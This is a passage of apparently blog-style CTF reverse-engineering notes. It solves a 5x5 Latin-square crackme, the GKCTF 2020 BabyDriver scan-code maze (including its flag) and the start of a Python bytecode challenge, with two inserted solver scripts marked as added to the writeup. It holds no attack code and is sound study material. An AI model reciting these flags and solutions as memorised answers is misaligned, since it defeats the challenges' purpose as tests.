class="number">0X601070</span> <span class="number">0X60106C</span> != <span class="number">0X601071</span> <span class="number">0X60106D</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X60106B</span> != <span class="number">0X601075</span> <span class="number">0X60106C</span> != <span class="number">0X601076</span> <span class="number">0X60106D</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601075</span> <span class="number">0X601071</span> != <span class="number">0X601076</span> <span class="number">0X601072</span> != <span class="number">0X601077</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601069</span> </span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X60106E</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X60106E</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X601073</span> != <span class="number">0X601078</span></span><br></pre></td></tr></table></figure><p>Let me summarise the pattern first: from <code>0x601060</code> to <code>0x601078</code>, every five bytes form a group; within a group no value repeats, and the values are only <code>01234</code>; the <code>n</code>-th digit of each group must also differ from group to group. The following cells depend on the input:</p><figure 
class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">byte_601062 = a1[<span class="number">0</span>];</span><br><span class="line">byte_601067 = a1[<span class="number">1</span>];</span><br><span class="line">byte_601069 = a1[<span class="number">2</span>];</span><br><span class="line">byte_60106B = a1[<span class="number">3</span>];</span><br><span class="line">byte_60106E = a1[<span class="number">4</span>];</span><br><span class="line">byte_60106F = a1[<span class="number">5</span>];</span><br><span class="line">byte_601071 = a1[<span class="number">6</span>];</span><br><span class="line">byte_601072 = a1[<span class="number">7</span>];</span><br><span class="line">byte_601076 = a1[<span class="number">8</span>];</span><br><span class="line">byte_601077 = a1[<span class="number">9</span>];</span><br></pre></td></tr></table></figure><p>So by these rules we can work out what the input-controlled cells must be (this smells like sudoku~); well, it is a sudoku, a 5*5 one. Then restore the input in the right order:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x601060</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601061</span> = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601062</span> = a1[<span class="number">0</span>] = <span class="number">30</span>h ; <span class="number">0</span> </span><br><span class="line"><span class="number">0x601063</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601064</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x601065</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601066</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span class="number">0x601067</span> = a1[<span class="number">1</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601068</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601069</span> = a1[<span class="number">2</span>] = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x60106A</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span class="number">0x60106B</span> = 
a1[<span class="number">3</span>] = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x60106C</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x60106D</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x60106E</span> = a1[<span class="number">4</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x60106F</span> = a1[<span class="number">5</span>] = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601070</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601071</span> = a1[<span class="number">6</span>] = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601072</span> = a1[<span class="number">7</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601073</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x601074</span> = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601075</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601076</span> = a1[<span class="number">8</span>] = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601077</span> = a1[<span class="number">9</span>] = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span 
class="number">0x601078</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br></pre></td></tr></table></figure><p>Then, following the order in <img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" srcset="" alt="image-20210218114711072"></p><p>restore the input and we are done~</p><h3 id="HITCTF-2020-Node"><a href="#HITCTF-2020-Node" class="headerlink" title="HITCTF 2020 Node"></a>HITCTF 2020 Node</h3><p>Too hard, shelving this one for now...</p><h3 id="GKCTF-2020-BabyDriver"><a href="#GKCTF-2020-BabyDriver" class="headerlink" title="GKCTF 2020 BabyDriver"></a>GKCTF 2020 BabyDriver</h3><p><code>DIE, IDA64, F12.</code> Why does this look like a <code>maze</code> challenge...</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">****************</span><br><span class="line">o.*..*......*..*</span><br><span class="line">*.**...**.*.*.**</span><br><span class="line">*.****.**.*.*.**</span><br><span class="line">*...**....*.*.**</span><br><span class="line">***..***.**.*..*</span><br><span class="line">*.**.***.**.**.*</span><br><span class="line">*.**.******.**.*</span><br><span class="line">*.**....***.**.*</span><br><span class="line">*.*****.***....*</span><br><span class="line">*...***.********</span><br><span class="line">**..***......#**</span><br><span class="line">**.*************</span><br><span 
class="line">****************</span><br></pre></td></tr></table></figure><p>The start and end points are clear; what matters is which key is up, down, left and right.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">sub_140001380</span><span class="params">(__int64 a1, __int64 a2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 v3; <span class="comment">// rdi</span></span><br><span class="line"> __int64 v4; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">int</span> v5; <span class="comment">// ecx</span></span><br><span class="line"> __int16 *v6; <span class="comment">// rsi</span></span><br><span class="line"> __int64 v7; <span class="comment">// rbp</span></span><br><span class="line"> __int16 v8; <span class="comment">// dx</span></span><br><span class="line"> <span class="keyword">char</span> v9; <span 
class="comment">// dl</span></span><br><span class="line"> <span class="keyword">const</span> CHAR *v10; <span class="comment">// rcx</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( *(<span class="keyword">int</span> *)(a2 + <span class="number">48</span>) >= <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> v3 = *(_QWORD *)(a2 + <span class="number">24</span>);</span><br><span class="line"> v4 = *(_QWORD *)(a2 + <span class="number">56</span>) >> <span class="number">3</span>;</span><br><span class="line"> <span class="keyword">if</span> ( (_DWORD)v4 )</span><br><span class="line"> {</span><br><span class="line"> v5 = dword_1400030E4;</span><br><span class="line"> v6 = (__int16 *)(v3 + <span class="number">2</span>);</span><br><span class="line"> v7 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)v4;</span><br><span class="line"> <span class="keyword">while</span> ( *(_WORD *)(v3 + <span class="number">4</span>) )</span><br><span class="line"> {</span><br><span class="line">LABEL_28:</span><br><span class="line"> v6 += <span class="number">6</span>;</span><br><span class="line"> <span class="keyword">if</span> ( !--v7 )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_29;</span><br><span class="line"> }</span><br><span class="line"> aO[v5] = <span class="string">'.'</span>;</span><br><span class="line"> v8 = *v6;</span><br><span class="line"> <span class="keyword">if</span> ( *v6 == <span class="number">23</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xFFFFFFF0</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 -= <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 
+= <span class="number">208</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 == <span class="number">37</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xFFFFFFF0</span>) != <span class="number">208</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 += <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 -= <span class="number">208</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 == <span class="number">36</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xF</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> --v5;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 += <span class="number">15</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 != <span class="number">38</span> )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_22;</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xF</span>) == <span class="number">15</span> )</span><br><span class="line"> v5 -= <span class="number">15</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> ++v5;</span><br><span class="line">LABEL_21:</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line">LABEL_22:</span><br><span 
class="line"> v9 = aO[v5];</span><br><span class="line"> <span class="keyword">if</span> ( v9 == <span class="string">'*'</span> )</span><br><span class="line"> {</span><br><span class="line"> v10 = <span class="string">"failed!\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v9 != <span class="string">'#'</span> )</span><br><span class="line"> {</span><br><span class="line">LABEL_27:</span><br><span class="line"> aO[v5] = <span class="number">111</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_28;</span><br><span class="line"> }</span><br><span class="line"> v10 = <span class="string">"success! flag is flag{md5(input)}\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> dword_1400030E4 = <span class="number">16</span>;</span><br><span class="line"> DbgPrint(v10);</span><br><span class="line"> v5 = dword_1400030E4;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_27;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">LABEL_29:</span><br><span class="line"> <span class="keyword">if</span> ( *(_BYTE *)(a2 + <span class="number">65</span>) )</span><br><span class="line"> *(_BYTE *)(*(_QWORD *)(a2 + <span class="number">184</span>) + <span class="number">3</span>i64) |= <span class="number">1u</span>;</span><br><span class="line"> <span class="keyword">return</span> *(<span class="keyword">unsigned</span> <span class="keyword">int</span> *)(a2 + <span class="number">48</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>It is easy to see which branches are up, down, left and right, but <code>23,36,37,38</code> are clearly not ordinary ASCII. A quick web search showed they are keyboard scan codes, corresponding to <code>ijkl</code>. Walking the maze by hand:</p><blockquote><p><code>LKKKLLKLKKKLLLKKKLLLLLL</code></p><p><code>flag{403950a6f64f7fc4b655dea696997851}</code></p></blockquote>]]></content>
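The 5x5 Latin square that sub_400917 checks can be solved directly instead of brute-forced. The following is an added example, not code from the writeup: it takes the fixed cells and the a1[] cell addresses from the tables above (GRID, INPUT_CELLS and the helper names are my own) and reads back the a1[] string.

```python
"""Solve the 5x5 Latin square checked by sub_400917 and read back the
input-controlled cells. Added example, not code from the original writeup.

The fixed cells and the positions of a1[0..9] come from the page's table
for 0x601060..0x601078; the name a1 follows the decompiler output."""
import itertools

SIZE = 5
DIGITS = "01234"          # sub_4006D6 only lets '0'..'4' through

# 0x601060.. laid out row-major, 5 bytes per row; None marks an input byte.
GRID = [
    ["1", "4", None, "2", "3"],    # 0x601060..0x601064
    ["3", "0", None, "1", None],   # 0x601065..0x601069
    ["0", None, "2", "3", None],   # 0x60106A..0x60106E
    [None, "3", None, None, "0"],  # 0x60106F..0x601073
    ["4", "2", None, None, "1"],   # 0x601074..0x601078
]

# which cell each a1[k] lands in, from sub_400881 (byte_601062 = a1[0], ...)
INPUT_CELLS = [0x601062, 0x601067, 0x601069, 0x60106B, 0x60106E,
               0x60106F, 0x601071, 0x601072, 0x601076, 0x601077]
BASE = 0x601060


def consistent(grid, r, c, d):
    """True if digit d can go at (r, c): unique in its row and its column."""
    return all(grid[r][j] != d for j in range(SIZE)) and \
           all(grid[i][c] != d for i in range(SIZE))


def solve(grid):
    """Backtracking fill of the None cells; returns a solved copy or None."""
    grid = [row[:] for row in grid]
    blanks = [(r, c) for r in range(SIZE) for c in range(SIZE) if grid[r][c] is None]

    def fill(k):
        if k == len(blanks):
            return True
        r, c = blanks[k]
        for d in DIGITS:
            if consistent(grid, r, c, d):
                grid[r][c] = d
                if fill(k + 1):
                    return True
                grid[r][c] = None
        return False

    return grid if fill(0) else None


def recover_a1(grid=GRID):
    """Solve the square and read a1[0..9] back from their cell addresses."""
    solved = solve(grid)
    if solved is None:
        return None
    cells = []
    for addr in INPUT_CELLS:
        off = addr - BASE
        cells.append(solved[off // SIZE][off % SIZE])
    return "".join(cells)


def check_all_pairs(grid):
    """Mirrors the sub_400917 style of check: every pair of cells in the
    same row and every pair in the same column must differ."""
    for i in range(SIZE):
        for a, b in itertools.combinations(range(SIZE), 2):
            if grid[i][a] == grid[i][b] or grid[a][i] == grid[b][i]:
                return False
    return True


if __name__ == "__main__":
    print(recover_a1())  # 0421421430, the a1[] values listed on the page
```

The result is the reordered buffer a1[], not the keyboard input; the final step still applies the permutation shown in the screenshot.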
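For the BabyDriver maze, here is an added example (not part of the original writeup) that searches the board from the page and emits the i/j/k/l key sequence using the movement rules of the decompiled branches; MOVES, SCAN_CODES and the function names are my own assumptions.

```python
"""BFS over the maze that sub_140001380 walks, emitting the key string the
driver expects. Added example, not code from the original writeup.

Movement follows the decompiled branches: scan code 23 (i) is row-1, 37 (k)
row+1, 36 (j) column-1, 38 (l) column+1, on a 16-column grid."""
from collections import deque

# the 14x16 board from the page (aO); 'o' start, '#' goal, '*' wall
MAZE = [
    "****************",
    "o.*..*......*..*",
    "*.**...**.*.*.**",
    "*.****.**.*.*.**",
    "*...**....*.*.**",
    "***..***.**.*..*",
    "*.**.***.**.**.*",
    "*.**.******.**.*",
    "*.**....***.**.*",
    "*.*****.***....*",
    "*...***.********",
    "**..***......#**",
    "**.*************",
    "****************",
]

# key letter -> (row delta, column delta), matching the four branches
MOVES = {"i": (-1, 0), "k": (1, 0), "j": (0, -1), "l": (0, 1)}
SCAN_CODES = {"i": 23, "j": 36, "k": 37, "l": 38}


def find(maze, ch):
    """(row, column) of the first occurrence of ch."""
    for r, row in enumerate(maze):
        if ch in row:
            return r, row.index(ch)
    raise ValueError(f"{ch!r} not in maze")


def solve_maze(maze=MAZE):
    """Shortest i/j/k/l sequence from 'o' to '#', or None if unreachable."""
    start, goal = find(maze, "o"), find(maze, "#")
    rows, cols = len(maze), len(maze[0])
    prev = {start: None}                      # cell -> (previous cell, key)
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            break
        for key, (dr, dc) in MOVES.items():
            nxt = (cur[0] + dr, cur[1] + dc)
            if nxt[0] not in range(rows) or nxt[1] not in range(cols):
                continue                      # walls ring the board anyway
            if maze[nxt[0]][nxt[1]] == "*" or nxt in prev:
                continue
            prev[nxt] = (cur, key)
            queue.append(nxt)
    if goal not in prev:
        return None
    path, cell = [], goal
    while prev[cell] is not None:
        cell, key = prev[cell]
        path.append(key)
    return "".join(reversed(path))


def replay(maze, keys):
    """Walk the keys the way the driver does and report the final cell's
    character: '#' for success, '*' as soon as a wall is hit."""
    r, c = find(maze, "o")
    for key in keys:
        dr, dc = MOVES[key]
        r, c = r + dr, c + dc
        if maze[r][c] == "*":
            return "*"
    return maze[r][c]


if __name__ == "__main__":
    keys = solve_maze()
    print(keys.upper())                       # LKKKLLKLKKKLLLKKKLLLLLL
    print([SCAN_CODES[k] for k in keys])      # the make codes the driver compares
```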
<categories>
<category> CTF Study Notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>RE Learning: RX Guided Path, week 6</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/</url>
<content type="html"><![CDATA[<h3 id="PyDis"><a href="#PyDis" class="headerlink" title="PyDis"></a>PyDis</h3><p>This challenge is probably <code>rx</code>'s imitation of the <code>pypy</code> challenge from this year's <code>hgame</code>...</p><p>First convert the <code>pyc</code> into <code>byte_code</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> dis,marshal</span><br><span class="line">f=<span class="built_in">open</span>(<span class="string">"pyre.cpython-39.pyc"</span>,<span class="string">"rb"</span>).read()</span><br><span class="line"><span class="comment"># skip the 16-byte pyc header of CPython 3.7+ (magic, flags, source mtime and size)</span></span><br><span class="line">code = marshal.loads(f[<span class="number">16</span>:])</span><br><span class="line"></span><br><span class="line">dis.dis(code)</span><br></pre></td></tr></table></figure><p>Yes, I just freeloaded this off 含树 (and I stand by it).</p><p>Then grind through the <code>byte_code</code> by hand:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span 
class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="number">0</span> BUILD_LIST <span class="number">0</span></span><br><span class="line"> <span class="number">2</span> LOAD_CONST <span class="number">0</span> ((<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span 
class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>))</span><br><span class="line"> <span class="number">4</span> CALL_FINALLY <span class="number">1</span> (to <span class="number">7</span>)</span><br><span class="line"> <span class="number">6</span> STORE_NAME <span class="number">0</span> (magic)</span><br><span class="line"></span><br><span class="line"> <span class="number">2</span> <span class="number">8</span> LOAD_NAME <span class="number">1</span> (<span class="built_in">input</span>)</span><br><span class="line"> <span class="number">10</span> LOAD_CONST <span class="number">1</span> (<span class="string">'flag >>> '</span>)</span><br><span class="line"> <span class="number">12</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">14</span> STORE_NAME <span class="number">2</span> (inp)</span><br><span class="line"></span><br><span class="line"> <span class="number">4</span> <span class="number">16</span> LOAD_NAME <span class="number">3</span> (<span class="built_in">list</span>)</span><br><span class="line"> <span class="number">18</span> LOAD_NAME <span class="number">2</span> (inp)</span><br><span class="line"> <span class="number">20</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">22</span> STORE_NAME <span class="number">4</span> (flag)</span><br><span class="line"></span><br><span class="line"> <span class="number">5</span> <span class="number">24</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">26</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">28</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">30</span> LOAD_NAME <span class="number">5</span> (<span 
class="built_in">len</span>)</span><br><span class="line"> <span class="number">32</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">34</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">36</span> COMPARE_OP <span class="number">3</span> (!=)</span><br><span class="line"> <span class="number">38</span> POP_JUMP_IF_FALSE <span class="number">54</span></span><br><span class="line"></span><br><span class="line"> <span class="number">6</span> <span class="number">40</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">42</span> LOAD_CONST <span class="number">2</span> (<span class="string">'qwq'</span>)</span><br><span class="line"> <span class="number">44</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">46</span> POP_TOP</span><br><span class="line"></span><br><span class="line"> <span class="number">7</span> <span class="number">48</span> LOAD_NAME <span class="number">7</span> (exit)</span><br><span class="line"> <span class="number">50</span> CALL_FUNCTION <span class="number">0</span></span><br><span class="line"> <span class="number">52</span> POP_TOP</span><br><span class="line"></span><br><span class="line"> <span class="number">9</span> >> <span class="number">54</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> <span class="number">56</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">58</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">60</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">62</span> LOAD_CONST <span class="number">3</span> (<span 
class="number">2</span>)</span><br><span class="line"> <span class="number">64</span> BINARY_FLOOR_DIVIDE</span><br><span class="line"> <span class="number">66</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">68</span> GET_ITER</span><br><span class="line"> >> <span class="number">70</span> FOR_ITER <span class="number">54</span> (to <span class="number">126</span>)</span><br><span class="line"> <span class="number">72</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">10</span> <span class="number">74</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">76</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">78</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">80</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">82</span> LOAD_CONST <span class="number">4</span> (<span class="number">1</span>)</span><br><span class="line"> <span class="number">84</span> BINARY_ADD</span><br><span class="line"> <span class="number">86</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">88</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">90</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">92</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">94</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">96</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">98</span> ROT_TWO</span><br><span class="line"> <span class="number">100</span> 